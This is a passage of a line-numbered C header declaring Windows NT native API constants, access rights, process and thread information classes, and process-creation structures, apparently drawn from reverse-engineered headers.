(CHAR *)(NULL) ) 53 | 54 | //Access Rights 55 | 56 | #define CALLBACK_MODIFY_STATE 0x0001 57 | #define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE ) 58 | 59 | #define DEBUG_READ_EVENT (0x0001) 60 | #define DEBUG_PROCESS_ASSIGN (0x0002) 61 | #define DEBUG_SET_INFORMATION (0x0004) 62 | #define DEBUG_QUERY_INFORMATION (0x0008) 63 | #define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\ 64 | DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION) 65 | 66 | #define DIRECTORY_QUERY (0x0001) 67 | #define DIRECTORY_TRAVERSE (0x0002) 68 | #define DIRECTORY_CREATE_OBJECT (0x0004) 69 | #define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) 70 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) 71 | 72 | #define EVENT_QUERY_STATE 0x0001 73 | #define EVENT_MODIFY_STATE 0x0002 74 | #define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) 75 | 76 | #define EVENT_PAIR_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE) 77 | 78 | #define IO_COMPLETION_QUERY_STATE 0x0001 79 | #define IO_COMPLETION_MODIFY_STATE 0x0002 80 | #define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) 81 | 82 | #define KEYEDEVENT_WAIT 0x0001 83 | #define KEYEDEVENT_WAKE 0x0002 84 | #define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE) 85 | 86 | #define MUTANT_QUERY_STATE 0x0001 87 | #ifndef MUTANT_ALL_ACCESS 88 | #define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE) 89 | #endif // _DEBUG 90 | 91 | 92 | #define PORT_CONNECT (0x0001) 93 | #define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1) 94 | 95 | #define PROFILE_CONTROL (0x0001) 96 | #define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL) 97 | 98 | #define SEMAPHORE_QUERY_STATE 0x0001 99 | #define SEMAPHORE_MODIFY_STATE 0x0002 100 | #define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) 101 | 102 | #define SYMBOLIC_LINK_QUERY (0x0001) 103 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 104 | 105 | #define THREAD_ALERT (0x0004) 106 | 107 | #define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 108 | #define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 109 | #define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004 110 | #define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 111 | #define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020 112 | #define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080 113 | 114 | #define WORKER_FACTORY_RELEASE_WORKER 0x0001 115 | #define WORKER_FACTORY_WAIT 0x0002 116 | #define WORKER_FACTORY_SET_INFORMATION 0x0004 117 | #define WORKER_FACTORY_QUERY_INFORMATION 0x0008 118 | #define WORKER_FACTORY_READY_WORKER 0x0010 119 | #define WORKER_FACTORY_SHUTDOWN 0x0020 120 | 121 | #define OBJECT_TYPE_CREATE (0x0001) 122 | #define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 123 | 124 | #define WMIGUID_QUERY 0x0001 125 | #define WMIGUID_SET 0x0002 126 | #define WMIGUID_NOTIFICATION 0x0004 127 | #define WMIGUID_READ_DESCRIPTION 0x0008 128 | #define WMIGUID_EXECUTE 0x0010 129 | #define TRACELOG_CREATE_REALTIME 0x0020 130 | #define TRACELOG_CREATE_ONDISK 0x0040 131 | #define TRACELOG_GUID_ENABLE 0x0080 132 | #define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100 133 | #define TRACELOG_CREATE_INPROC 0x0200 134 | #define TRACELOG_ACCESS_REALTIME 0x0400 135 | #define TRACELOG_REGISTER_GUIDS 0x0800 136 | 137 | // 138 | // Partition Specific Access Rights. 139 | // 140 | 141 | #define MEMORY_PARTITION_QUERY_ACCESS 0x0001 142 | #define MEMORY_PARTITION_MODIFY_ACCESS 0x0002 143 | 144 | #define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \ 145 | SYNCHRONIZE | \ 146 | MEMORY_PARTITION_QUERY_ACCESS | \ 147 | MEMORY_PARTITION_MODIFY_ACCESS) 148 | 149 | 150 | // 151 | // NtCreateProcessEx specific flags. 152 | // 153 | #define PS_REQUEST_BREAKAWAY 1 154 | #define PS_NO_DEBUG_INHERIT 2 155 | #define PS_INHERIT_HANDLES 4 156 | #define PS_LARGE_PAGES 8 157 | #define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \ 158 | PS_NO_DEBUG_INHERIT | \ 159 | PS_INHERIT_HANDLES | \ 160 | PS_LARGE_PAGES) 161 | 162 | #define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) 163 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 164 | #define ZwCurrentProcess() NtCurrentProcess() 165 | #define ZwCurrentThread() NtCurrentThread() 166 | 167 | // 168 | // Define special ByteOffset parameters for read and write operations 169 | // 170 | 171 | #define FILE_WRITE_TO_END_OF_FILE 0xffffffff 172 | #define FILE_USE_FILE_POINTER_POSITION 0xfffffffe 173 | 174 | // 175 | // This is the maximum MaximumLength for a UNICODE_STRING. 176 | // 177 | 178 | #define MAXUSHORT 0xffff 179 | #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) 180 | 181 | typedef struct _EX_RUNDOWN_REF 182 | { 183 | union 184 | { 185 | ULONG Count; 186 | PVOID Ptr; 187 | }; 188 | } EX_RUNDOWN_REF, *PEX_RUNDOWN_REF; 189 | 190 | typedef struct _UNICODE_STRING { 191 | USHORT Length; 192 | USHORT MaximumLength; 193 | PWSTR Buffer; 194 | } UNICODE_STRING; 195 | typedef UNICODE_STRING *PUNICODE_STRING; 196 | typedef const UNICODE_STRING *PCUNICODE_STRING; 197 | 198 | typedef struct _STRING 199 | { 200 | USHORT Length; 201 | USHORT MaximumLength; 202 | PCHAR Buffer; 203 | } STRING; 204 | typedef STRING *PSTRING; 205 | 206 | typedef STRING ANSI_STRING; 207 | typedef PSTRING PANSI_STRING; 208 | 209 | typedef STRING OEM_STRING; 210 | typedef PSTRING POEM_STRING; 211 | typedef CONST STRING* PCOEM_STRING; 212 | typedef CONST char *PCSZ; 213 | 214 | typedef struct _CSTRING 215 | { 216 | USHORT Length; 217 | USHORT MaximumLength; 218 | CONST char *Buffer; 219 | } CSTRING; 220 | typedef CSTRING *PCSTRING; 221 | #define ANSI_NULL ((CHAR)0) 222 | 223 | typedef STRING CANSI_STRING; 224 | typedef PSTRING PCANSI_STRING; 225 | 226 | typedef struct _OBJECT_ATTRIBUTES { 227 | ULONG Length; 228 | HANDLE RootDirectory; 229 | PUNICODE_STRING ObjectName; 230 | ULONG Attributes; 231 | PVOID SecurityDescriptor; 232 | PVOID SecurityQualityOfService; 233 | } OBJECT_ATTRIBUTES; 234 | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES; 235 | 236 | typedef struct _IO_STATUS_BLOCK { 237 | union { 238 | NTSTATUS Status; 239 | PVOID Pointer; 240 | } DUMMYUNIONNAME; 241 | 242 | ULONG_PTR Information; 243 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 244 | 245 | /* 246 | ** Semaphore START 247 | */ 248 | 249 | #ifndef _SEMAPHORE_INFORMATION_CLASS 250 | typedef enum _SEMAPHORE_INFORMATION_CLASS { 251 | SemaphoreBasicInformation 252 | } SEMAPHORE_INFORMATION_CLASS; 253 | #endif 254 | 255 | #ifndef _SEMAPHORE_BASIC_INFORMATION 256 | typedef struct _SEMAPHORE_BASIC_INFORMATION { 257 | LONG CurrentCount; 258 | LONG MaximumCount; 259 | } SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION; 260 | #endif 261 | 262 | /* 263 | ** Semaphore END 264 | */ 265 | 266 | /* 267 | ** Kernel Debugger START 268 | */ 269 | 270 | typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { 271 | BOOLEAN KernelDebuggerEnabled; 272 | BOOLEAN KernelDebuggerNotPresent; 273 | } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; 274 | 275 | /* 276 | ** Kernel Debugger END 277 | */ 278 | 279 | /* 280 | ** FileCache and MemoryList START 281 | */ 282 | 283 | typedef enum _SYSTEM_MEMORY_LIST_COMMAND { 284 | MemoryCaptureAccessedBits, 285 | MemoryCaptureAndResetAccessedBits, 286 | MemoryEmptyWorkingSets, 287 | MemoryFlushModifiedList, 288 | MemoryPurgeStandbyList, 289 | MemoryPurgeLowPriorityStandbyList, 290 | MemoryCommandMax 291 | } SYSTEM_MEMORY_LIST_COMMAND; 292 | 293 | typedef struct _SYSTEM_FILECACHE_INFORMATION { 294 | SIZE_T CurrentSize; 295 | SIZE_T PeakSize; 296 | ULONG PageFaultCount; 297 | SIZE_T MinimumWorkingSet; 298 | SIZE_T MaximumWorkingSet; 299 | SIZE_T CurrentSizeIncludingTransitionInPages; 300 | SIZE_T PeakSizeIncludingTransitionInPages; 301 | ULONG TransitionRePurposeCount; 302 | ULONG Flags; 303 | } SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; 304 | 305 | /* 306 | ** FileCache and MemoryList END 307 | */ 308 | 309 | /* 310 | ** Processes START 311 | */ 312 | 313 | typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { 314 | LARGE_INTEGER BootTime; 315 | LARGE_INTEGER CurrentTime; 316 | LARGE_INTEGER TimeZoneBias; 317 | ULONG TimeZoneId; 318 | ULONG Reserved; 319 | ULONGLONG BootTimeBias; 320 | ULONGLONG SleepTimeBias; 321 | } SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; 322 | 323 | #ifndef KPRIORITY 324 | typedef LONG KPRIORITY; 325 | #endif 326 | 327 | typedef enum _THREAD_STATE { 328 | StateInitialized, 329 | StateReady, 330 | StateRunning, 331 | StateStandby, 332 | StateTerminated, 333 | StateWait, 334 | StateTransition, 335 | StateUnknown 336 | } THREAD_STATE; 337 | 338 | typedef enum _KWAIT_REASON { 339 | Executive, 340 | FreePage, 341 | PageIn, 342 | PoolAllocation, 343 | DelayExecution, 344 | Suspended, 345 | UserRequest, 346 | WrExecutive, 347 | WrFreePage, 348 | WrPageIn, 349 | WrPoolAllocation, 350 | WrDelayExecution, 351 | WrSuspended, 352 | WrUserRequest, 353 | WrEventPair, 354 | WrQueue, 355 | WrLpcReceive, 356 | WrLpcReply, 357 | WrVirtualMemory, 358 | WrPageOut, 359 | WrRendezvous, 360 | WrKeyedEvent, 361 | WrTerminated, 362 | WrProcessInSwap, 363 | WrCpuRateControl, 364 | WrCalloutStack, 365 | WrKernel, 366 | WrResource, 367 | WrPushLock, 368 | WrMutex, 369 | WrQuantumEnd, 370 | WrDispatchInt, 371 | WrPreempted, 372 | WrYieldExecution, 373 | WrFastMutex, 374 | WrGuardedMutex, 375 | WrRundown, 376 | MaximumWaitReason 377 | } KWAIT_REASON; 378 | 379 | typedef VOID KSTART_ROUTINE( 380 | _In_ PVOID StartContext 381 | ); 382 | typedef KSTART_ROUTINE *PKSTART_ROUTINE; 383 | 384 | typedef struct _CLIENT_ID { 385 | HANDLE UniqueProcess; 386 | HANDLE UniqueThread; 387 | } CLIENT_ID, *PCLIENT_ID; 388 | 389 | typedef struct _CLIENT_ID64 { 390 | ULONG64 UniqueProcess; 391 | ULONG64 UniqueThread; 392 | } CLIENT_ID64, *PCLIENT_ID64; 393 | 394 | typedef struct _CLIENT_ID32 { 395 | ULONG32 UniqueProcess; 396 | ULONG32 UniqueThread; 397 | } CLIENT_ID32, *PCLIENT_ID32; 398 | 399 | typedef struct _VM_COUNTERS { 400 | SIZE_T PeakVirtualSize; 401 | SIZE_T VirtualSize; 402 | ULONG PageFaultCount; 403 | SIZE_T PeakWorkingSetSize; 404 | SIZE_T WorkingSetSize; 405 | SIZE_T QuotaPeakPagedPoolUsage; 406 | SIZE_T QuotaPagedPoolUsage; 407 | SIZE_T QuotaPeakNonPagedPoolUsage; 408 | SIZE_T QuotaNonPagedPoolUsage; 409 | SIZE_T PagefileUsage; 410 | SIZE_T PeakPagefileUsage; 411 | SIZE_T PrivatePageCount; 412 | } VM_COUNTERS; 413 | 414 | typedef struct _SYSTEM_THREAD_INFORMATION { 415 | LARGE_INTEGER KernelTime; 416 | LARGE_INTEGER UserTime; 417 | LARGE_INTEGER CreateTime; 418 | ULONG WaitTime; 419 | PVOID StartAddress; 420 | CLIENT_ID ClientId; 421 | KPRIORITY Priority; 422 | KPRIORITY BasePriority; 423 | ULONG ContextSwitchCount; 424 | THREAD_STATE State; 425 | KWAIT_REASON WaitReason; 426 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; 427 | 428 | typedef struct _SYSTEM_PROCESSES_INFORMATION { 429 | ULONG NextEntryDelta; 430 | ULONG ThreadCount; 431 | LARGE_INTEGER SpareLi1; 432 | LARGE_INTEGER SpareLi2; 433 | LARGE_INTEGER SpareLi3; 434 | LARGE_INTEGER CreateTime; 435 | LARGE_INTEGER UserTime; 436 | LARGE_INTEGER KernelTime; 437 | UNICODE_STRING ImageName; 438 | KPRIORITY BasePriority; 439 | HANDLE UniqueProcessId; 440 | HANDLE InheritedFromUniqueProcessId; 441 | ULONG HandleCount; 442 | ULONG SessionId; 443 | ULONG_PTR PageDirectoryBase; 444 | VM_COUNTERS VmCounters; 445 | IO_COUNTERS IoCounters; 446 | SYSTEM_THREAD_INFORMATION Threads[1]; 447 | } SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; 448 | 449 | #if defined(_WIN64) 450 | typedef ULONG SYSINF_PAGE_COUNT; 451 | #else 452 | typedef SIZE_T SYSINF_PAGE_COUNT; 453 | #endif 454 | 455 | typedef struct _SYSTEM_BASIC_INFORMATION { 456 | ULONG Reserved; 457 | ULONG TimerResolution; 458 | ULONG PageSize; 459 | SYSINF_PAGE_COUNT NumberOfPhysicalPages; 460 | SYSINF_PAGE_COUNT LowestPhysicalPageNumber; 461 | SYSINF_PAGE_COUNT HighestPhysicalPageNumber; 462 | ULONG AllocationGranularity; 463 | ULONG_PTR MinimumUserModeAddress; 464 | ULONG_PTR MaximumUserModeAddress; 465 | ULONG_PTR ActiveProcessorsAffinityMask; 466 | CCHAR NumberOfProcessors; 467 | } SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; 468 | 469 | typedef enum _PROCESSINFOCLASS { 470 | ProcessBasicInformation = 0, 471 | ProcessQuotaLimits = 1, 472 | ProcessIoCounters = 2, 473 | ProcessVmCounters = 3, 474 | ProcessTimes = 4, 475 | ProcessBasePriority = 5, 476 | ProcessRaisePriority = 6, 477 | ProcessDebugPort = 7, 478 | ProcessExceptionPort = 8, 479 | ProcessAccessToken = 9, 480 | ProcessLdtInformation = 10, 481 | ProcessLdtSize = 11, 482 | ProcessDefaultHardErrorMode = 12, 483 | ProcessIoPortHandlers = 13, 484 | ProcessPooledUsageAndLimits = 14, 485 | ProcessWorkingSetWatch = 15, 486 | ProcessUserModeIOPL = 16, 487 | ProcessEnableAlignmentFaultFixup = 17, 488 | ProcessPriorityClass = 18, 489 | ProcessWx86Information = 19, 490 | ProcessHandleCount = 20, 491 | ProcessAffinityMask = 21, 492 | ProcessPriorityBoost = 22, 493 | ProcessDeviceMap = 23, 494 | ProcessSessionInformation = 24, 495 | ProcessForegroundInformation = 25, 496 | ProcessWow64Information = 26, 497 | ProcessImageFileName = 27, 498 | ProcessLUIDDeviceMapsEnabled = 28, 499 | ProcessBreakOnTermination = 29, 500 | ProcessDebugObjectHandle = 30, 501 | ProcessDebugFlags = 31, 502 | ProcessHandleTracing = 32, 503 | ProcessIoPriority = 33, 504 | ProcessExecuteFlags = 34, 505 | ProcessTlsInformation = 35, 506 | ProcessCookie = 36, 507 | ProcessImageInformation = 37, 508 | ProcessCycleTime = 38, 509 | ProcessPagePriority = 39, 510 | ProcessInstrumentationCallback = 40, 511 | ProcessThreadStackAllocation = 41, 512 | ProcessWorkingSetWatchEx = 42, 513 | ProcessImageFileNameWin32 = 43, 514 | ProcessImageFileMapping = 44, 515 | ProcessAffinityUpdateMode = 45, 516 | ProcessMemoryAllocationMode = 46, 517 | ProcessGroupInformation = 47, 518 | ProcessTokenVirtualizationEnabled = 48, 519 | ProcessOwnerInformation = 49, 520 | ProcessWindowInformation = 50, 521 | ProcessHandleInformation = 51, 522 | ProcessMitigationPolicy = 52, 523 | ProcessDynamicFunctionTableInformation = 53, 524 | ProcessHandleCheckingMode = 54, 525 | ProcessKeepAliveCount = 55, 526 | ProcessRevokeFileHandles = 56, 527 | ProcessWorkingSetControl = 57, 528 | ProcessHandleTable = 58, 529 | ProcessCheckStackExtentsMode = 59, 530 | ProcessCommandLineInformation = 60, 531 | ProcessProtectionInformation = 61, 532 | MaxProcessInfoClass = 62 533 | } PROCESSINFOCLASS; 534 | 535 | typedef enum _THREADINFOCLASS { 536 | ThreadBasicInformation, 537 | ThreadTimes, 538 | ThreadPriority, 539 | ThreadBasePriority, 540 | ThreadAffinityMask, 541 | ThreadImpersonationToken, 542 | ThreadDescriptorTableEntry, 543 | ThreadEnableAlignmentFaultFixup, 544 | ThreadEventPair, 545 | ThreadQuerySetWin32StartAddress, 546 | ThreadZeroTlsCell, 547 | ThreadPerformanceCount, 548 | ThreadAmILastThread, 549 | ThreadIdealProcessor, 550 | ThreadPriorityBoost, 551 | ThreadSetTlsArrayAddress, 552 | ThreadIsIoPending, 553 | ThreadHideFromDebugger, 554 | ThreadBreakOnTermination, 555 | ThreadSwitchLegacyState, 556 | ThreadIsTerminated, 557 | ThreadLastSystemCall, 558 | ThreadIoPriority, 559 | ThreadCycleTime, 560 | ThreadPagePriority, 561 | ThreadActualBasePriority, 562 | ThreadTebInformation, 563 | ThreadCSwitchMon, 564 | ThreadCSwitchPmu, 565 | ThreadWow64Context, 566 | ThreadGroupInformation, 567 | ThreadUmsInformation, 568 | ThreadCounterProfiling, 569 | ThreadIdealProcessorEx, 570 | ThreadCpuAccountingInformation, 571 | ThreadSuspendCount, 572 | ThreadHeterogeneousCpuPolicy, 573 | ThreadContainerId, 574 | ThreadNameInformation, 575 | ThreadProperty, 576 | ThreadSelectedCpuSets, 577 | ThreadSystemThreadInformation, 578 | MaxThreadInfoClass 579 | } THREADINFOCLASS; 580 | 581 | typedef struct _PROCESS_BASIC_INFORMATION { 582 | NTSTATUS ExitStatus; 583 | PVOID PebBaseAddress; 584 | ULONG_PTR AffinityMask; 585 | KPRIORITY BasePriority; 586 | ULONG_PTR UniqueProcessId; 587 | ULONG_PTR InheritedFromUniqueProcessId; 588 | } PROCESS_BASIC_INFORMATION; 589 | typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; 590 | 591 | typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION { 592 | SIZE_T Size; 593 | PROCESS_BASIC_INFORMATION BasicInfo; 594 | union 595 | { 596 | ULONG Flags; 597 | struct 598 | { 599 | ULONG IsProtectedProcess : 1; 600 | ULONG IsWow64Process : 1; 601 | ULONG IsProcessDeleting : 1; 602 | ULONG IsCrossSessionCreate : 1; 603 | ULONG IsFrozen : 1; 604 | ULONG IsBackground : 1; 605 | ULONG IsStronglyNamed : 1; 606 | ULONG SpareBits : 25; 607 | } DUMMYSTRUCTNAME; 608 | } DUMMYUNIONNAME; 609 | } PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION; 610 | 611 | typedef struct _PROCESS_ACCESS_TOKEN { 612 | HANDLE Token; 613 | HANDLE Thread; 614 | } PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN; 615 | 616 | //thanks to wj32 headers 617 | 618 | typedef enum _PS_CREATE_STATE { 619 | PsCreateInitialState, 620 | PsCreateFailOnFileOpen, 621 | PsCreateFailOnSectionCreate, 622 | PsCreateFailExeFormat, 623 | PsCreateFailMachineMismatch, 624 | PsCreateFailExeName, 625 | PsCreateSuccess, 626 | PsCreateMaximumStates 627 | } PS_CREATE_STATE; 628 | 629 | typedef struct _PS_CREATE_INFO { 630 | SIZE_T Size; 631 | PS_CREATE_STATE State; 632 | union 633 | { 634 | struct 635 | { 636 | union 637 | { 638 | ULONG InitFlags; 639 | struct 640 | { 641 | UCHAR WriteOutputOnExit : 1; 642 | UCHAR DetectManifest : 1; 643 | UCHAR IFEOSkipDebugger : 1; 644 | UCHAR IFEODoNotPropagateKeyState : 1; 645 | UCHAR SpareBits1 : 4; 646 | UCHAR SpareBits2 : 8; 647 | USHORT ProhibitedImageCharacteristics : 16; 648 | }; 649 | }; 650 | ACCESS_MASK AdditionalFileAccess; 651 | } InitState; 652 | 653 | struct 654 | { 655 | HANDLE FileHandle; 656 | } FailSection; 657 | 658 | struct 659 | { 660 | USHORT DllCharacteristics; 661 | } ExeFormat; 662 | 663 | struct 664 | { 665 | HANDLE IFEOKey; 666 | } ExeName; 667 | 668 | struct 669 | { 670 | union 671 | { 672 | ULONG OutputFlags; 673 | struct 674 | { 675 | UCHAR ProtectedProcess : 1; 676 | UCHAR AddressSpaceOverride : 1; 677 | UCHAR DevOverrideEnabled : 1; 678 | UCHAR ManifestDetected : 1; 679 | UCHAR ProtectedProcessLight : 1; 680 | UCHAR SpareBits1 : 3; 681 | UCHAR SpareBits2 : 8; 682 | USHORT SpareBits3 : 16; 683 | }; 684 | }; 685 | HANDLE FileHandle; 686 | HANDLE SectionHandle; 687 | ULONGLONG UserProcessParametersNative; 688 | ULONG UserProcessParametersWow64; 689 | ULONG CurrentParameterFlags; 690 | ULONGLONG PebAddressNative; 691 | ULONG PebAddressWow64; 692 | ULONGLONG ManifestAddress; 693 | ULONG ManifestSize; 694 | } SuccessState; 695 | }; 696 | } PS_CREATE_INFO, *PPS_CREATE_INFO; 697 | 698 | typedef struct _PS_ATTRIBUTE 699 | { 700 | ULONG Attribute; 701 | SIZE_T Size; 702 | union 703 | { 704 | ULONG Value; 705 | PVOID ValuePtr; 706 | }; 707 | PSIZE_T ReturnLength; 708 | } PS_ATTRIBUTE, *PPS_ATTRIBUTE; 709 | 710 | typedef struct _PS_ATTRIBUTE_LIST 711 | { 712 | SIZE_T TotalLength; 713 | PS_ATTRIBUTE Attributes[1]; 714 | } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST; 715 | 716 | typedef enum _PS_PROTECTED_TYPE 717 | { 718 | PsProtectedTypeNone, 719 | PsProtectedTypeProtectedLight, 720 | PsProtectedTypeProtected, 721 | PsProtectedTypeMax 722 | } PS_PROTECTED_TYPE; 723 | 724 | typedef enum _PS_PROTECTED_SIGNER 725 | { 726 | PsProtectedSignerNone, 727 | PsProtectedSignerAuthenticode, 728 | PsProtectedSignerCodeGen, 729 | PsProtectedSignerAntimalware, 730 | PsProtectedSignerLsa, 731 | PsProtectedSignerWindows, 732 | PsProtectedSignerWinTcb, 733 | PsProtectedSignerMax 734 | } PS_PROTECTED_SIGNER; 735 | 736 | typedef struct _PS_PROTECTION 737 | { 738 | union 739 | { 740 | UCHAR Level; 741 | struct 742 | { 743 | UCHAR Type : 3; 744 | UCHAR Audit : 1; 745 | UCHAR Signer : 4; 746 | }; 747 | }; 748 | } PS_PROTECTION, *PPS_PROTECTION; 749 | 750 | // begin_rev 751 | #define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff 752 | #define PS_ATTRIBUTE_THREAD 0x00010000 753 | #define PS_ATTRIBUTE_INPUT 0x00020000 754 | #define PS_ATTRIBUTE_ADDITIVE 0x00040000 755 | // end_rev 756 | 757 | typedef enum _PS_ATTRIBUTE_NUM { 758 | PsAttributeParentProcess, 759 | PsAttributeDebugPort, 760 | PsAttributeToken, 761 | PsAttributeClientId, 762 | PsAttributeTebAddress, 763 | PsAttributeImageName, 764 | PsAttributeImageInfo, 765 | PsAttributeMemoryReserve, 766 | PsAttributePriorityClass, 767 | PsAttributeErrorMode, 768 | PsAttributeStdHandleInfo, 769 | PsAttributeHandleList, 770 | PsAttributeGroupAffinity, 771 | PsAttributePreferredNode, 772 | PsAttributeIdealProcessor, 773 | PsAttributeUmsThread, 774 | PsAttributeMitigationOptions, 775 | PsAttributeProtectionLevel, 776 | PsAttributeSecureProcess, 777 | PsAttributeJobList, 778 | PsAttributeMax 779 | } PS_ATTRIBUTE_NUM; 780 | 781 | #define PsAttributeValue(Number, Thread, Input, Unknown) \ 782 | (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \ 783 | ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \ 784 | ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \ 785 | ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0)) 786 | 787 | #define PS_ATTRIBUTE_PARENT_PROCESS \ 788 | PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE) 789 | #define PS_ATTRIBUTE_DEBUG_PORT \ 790 | PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE) 791 | #define PS_ATTRIBUTE_TOKEN \ 792 | PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE) 793 | #define PS_ATTRIBUTE_CLIENT_ID \ 794 | PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE) 795 | #define PS_ATTRIBUTE_TEB_ADDRESS \ 796 | PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE) 797 | #define PS_ATTRIBUTE_IMAGE_NAME \ 798 | PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE) 799 | #define PS_ATTRIBUTE_IMAGE_INFO \ 800 | PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE) 801 | #define PS_ATTRIBUTE_MEMORY_RESERVE \ 802 | PsAttributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE) 803 | #define PS_ATTRIBUTE_PRIORITY_CLASS \ 804 | PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE) 805 | #define PS_ATTRIBUTE_ERROR_MODE \ 806 | PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE) 807 | #define PS_ATTRIBUTE_STD_HANDLE_INFO \ 808 | PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE) 809 | #define PS_ATTRIBUTE_HANDLE_LIST \ 810 | PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE) 811 | #define PS_ATTRIBUTE_GROUP_AFFINITY \ 812 | PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE) 813 | #define PS_ATTRIBUTE_PREFERRED_NODE \ 814 | PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE) 815 | #define PS_ATTRIBUTE_IDEAL_PROCESSOR \ 816 | PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE) 817 | #define PS_ATTRIBUTE_MITIGATION_OPTIONS \ 818 | PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, TRUE) 819 | 820 | 821 | #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001 822 | #define RTL_USER_PROC_PROFILE_USER 0x00000002 823 | #define RTL_USER_PROC_PROFILE_KERNEL 0x00000004 824 | #define RTL_USER_PROC_PROFILE_SERVER 0x00000008 825 | #define RTL_USER_PROC_RESERVE_1MB 0x00000020 826 | #define RTL_USER_PROC_RESERVE_16MB 0x00000040 827 | #define RTL_USER_PROC_CASE_SENSITIVE 0x00000080 828 | #define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100 829 | #define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000 830 | #define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000 831 | #define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000 832 | #define RTL_USER_PROC_OPTIN_PROCESS 0x00020000 833 | 834 | /* 835 | ** Processes END 836 | */ 837 | 838 | #ifndef _SYSTEM_INFORMATION_CLASS 839 | typedef enum _SYSTEM_INFORMATION_CLASS 840 | { 841 | SystemBasicInformation = 0, 842 | SystemProcessorInformation = 1, 843 | SystemPerformanceInformation = 2, 844 | SystemTimeOfDayInformation = 3, 845 | SystemPathInformation = 4, 846 | SystemProcessInformation = 5, 847 | SystemCallCountInformation = 6, 848 | SystemDeviceInformation = 7, 849 | SystemProcessorPerformanceInformation = 8, 850 | SystemFlagsInformation = 9, 851 | SystemCallTimeInformation = 10, 852 | SystemModuleInformation = 11, 853 | SystemLocksInformation = 12, 854 | SystemStackTraceInformation = 13, 855 | SystemPagedPoolInformation = 14, 856 | SystemNonPagedPoolInformation = 15, 857 | SystemHandleInformation = 16, 